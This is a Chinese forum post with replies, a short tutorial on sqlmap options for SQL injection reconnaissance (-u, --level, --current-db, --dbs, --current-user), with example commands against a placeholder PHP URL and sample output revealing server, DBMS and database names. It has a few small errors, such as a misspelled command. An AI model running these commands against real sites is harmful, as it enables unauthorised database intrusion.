sqlmap用法

Ross0911

sqlmap用法
【-u/--url="url"】 #后面接目标网址，表示测试的目标地址。
【-v/--level=number】 #number=[0-5]，表示测试结果的详细程度。数值越大，内容越详细。

sqlmap.py -u “url”  -v 0-5
或
sqlmap.py --url="url" --level=0-5

通过以上参数，会得到：
1、目标的操作系统信息
2、数据库的类型[MySQL/MSSQL/Access]、版本号
3、Web服务器版本、版本号
4、支持的脚本类型

Example:

sqlmap.py --url="http://www.xxxx.com/index.php?ID=111" --level=1
sqlmap.py -u "http://www.xxxx.com/index.php?ID=111" --v 1

Result:

web server operating system: Linux Red Hat Enterprise 3 (Taroon)
web application technology: PHP 4.3.2, Apache 2.0.46
back-end DBMS: MySQL 4

【--current-db】 #表示获取当前数据库的名称。但实测中对Access的数据库不能获得数据库名称

sqlmay.py --url="url" --current-db

通过以上参数，会得到：
1、当前所用的数据库的名称

Example:

sqlmap.py --url="http://www.xxxx.com/index.php?ID=111" --current-db

Result:
current database:    'greenbergdevDB'

【--dbs】#列举所有的数据库名单。我这里只列出来一个。可能是因为权限的问题。

sqlmap.py --url="url" --dbs

Exampl:

sqlmap.py --url="http://www.xxxx.com/index.php?ID=111" --dbs --level=1

Result:

available databases [1]:
# greenbergdevDB

【--current-user】 #表示获取当前数据库的用户名

sqlmap.py --url="url" --current-user

通过以上参数，会得到：
1、当前数据库的用户名

Example:

sqlmap.py --url="http://www.xxxx.com/index.php?ID=111" --current-user --level

Result:

current user:    '********@localhost'

lsekfe

感谢LZ的分享~

张守婷

lalallal

张守婷

[quote][/quote]

suier

那个php的网址是怎么得到的，我这边的网址都没有这样的后缀啊，抓包出来的也没有